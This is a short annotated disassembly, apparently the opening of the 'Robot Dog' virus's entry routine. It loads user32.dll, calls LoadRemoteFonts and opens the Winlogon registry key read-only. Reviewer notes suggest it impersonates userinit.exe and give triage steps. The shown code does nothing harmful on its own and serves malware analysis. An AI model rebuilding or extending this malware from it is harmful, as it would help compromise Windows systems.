| 机器狗病毒入侵源码
; Page title above reads: "Robot Dog virus intrusion source code".
; Debugger disassembly (address, marker, opcode bytes, instruction, comment) of
; the entry routine of a 32-bit module the debugger names "userinIT".
; Only the first part of the routine is on this page; the listing stops in the
; middle of an argument push sequence and continues on the following pages.
;
; Stack frame as used by the visible code:
;   [ebp-4]    receives the opened registry key handle
;   [ebp-8]    dword set to 104h (260)
;   [ebp-10C]  start of a buffer; 104h bytes lie between it and [ebp-8]
;
; NOTE(review): the module name and the Winlogon subkey are the artefacts
; visible here. Judging by the name, the image may be posing as or replacing
; userinit.exe, so checking that file's hash/signature and the values under
; the Winlogon key looks like the relevant triage step. Confirm against the
; rest of the listing.

; --- prologue: frame pointer plus 118h bytes of locals ---
0040045A > $ 55               push ebp                                        ; (initial CPU selection)
0040045B   . 8BEC             mov ebp,esp
0040045D   . 81C4 E8FEFFFF    add esp,-118

; --- load user32.dll; skip the font call if the load fails (eax == 0) ---
00400463   . 68 9C0A4000      push userinIT.00400A9C                          ; /user32.dll
00400468   . E8 55020000      call <jmp.&kernel32.LoadLibraryA>               ; \LoadLibraryA
0040046D   . 0BC0             or eax,eax
0040046F   . 74 11            je short userinIT.00400482

; --- resolve the export by name and call it with no arguments, if found ---
00400471   . 68 A70A4000      push userinIT.00400AA7                          ; /loadremotefonts
00400476   . 50               push eax                                        ; |hModule
00400477   . E8 34020000      call <jmp.&kernel32.GetProcAddress>             ; \GetProcAddress
0040047C   . 0BC0             or eax,eax
0040047E   . 74 02            je short userinIT.00400482
00400480   . FFD0             call eax                                        ; USER32.LoadRemoteFonts

; --- open HKLM\software\microsoft\windows nt\currentversion\winlogon read-only ---
; The handle is written to [ebp-4]. No write access is requested at this point.
00400482   > 8D45 FC          lea eax,dword ptr ss:[ebp-4]
00400485   . 50               push eax                                        ; /pHandle
00400486   . 68 19000200      push 20019                                      ; |Access = KEY_READ
0040048B   . 6A 00            push 0                                          ; |Reserved = 0
0040048D   . 68 B70A4000      push userinIT.00400AB7                          ; |software\microsoft\windows nt\currentversion\winlogon
00400492   . 68 02000080      push 80000002                                   ; |hKey = HKEY_LOCAL_MACHINE
00400497   . E8 5C020000      call <jmp.&advapi32.RegOpenKeyExA>              ; \RegOpenKeyExA

; A non-zero return means the open failed; control then goes to 004004E8,
; which is not on this page.
0040049C   . 0BC0             or eax,eax                                      //open the registry and check the winlogon key value
0040049E   . 75 48            jnz short userinIT.004004E8

; --- key opened: set a 104h size variable and begin pushing call arguments ---
; NOTE(review): the call that takes these arguments is not on this page.
; [ebp-8] is presumably the in/out byte count for a later value query. Confirm on the next page.
004004A0   . C745 F8 04010000 mov dword ptr ss:[ebp-8],104
004004A7   . 68 04010000      push 104                                        ; /Length = 104 (260.)
004004AC   . 8D85 F4FEFFFF    lea eax,dword ptr ss:[ebp-10C]                  ; |
|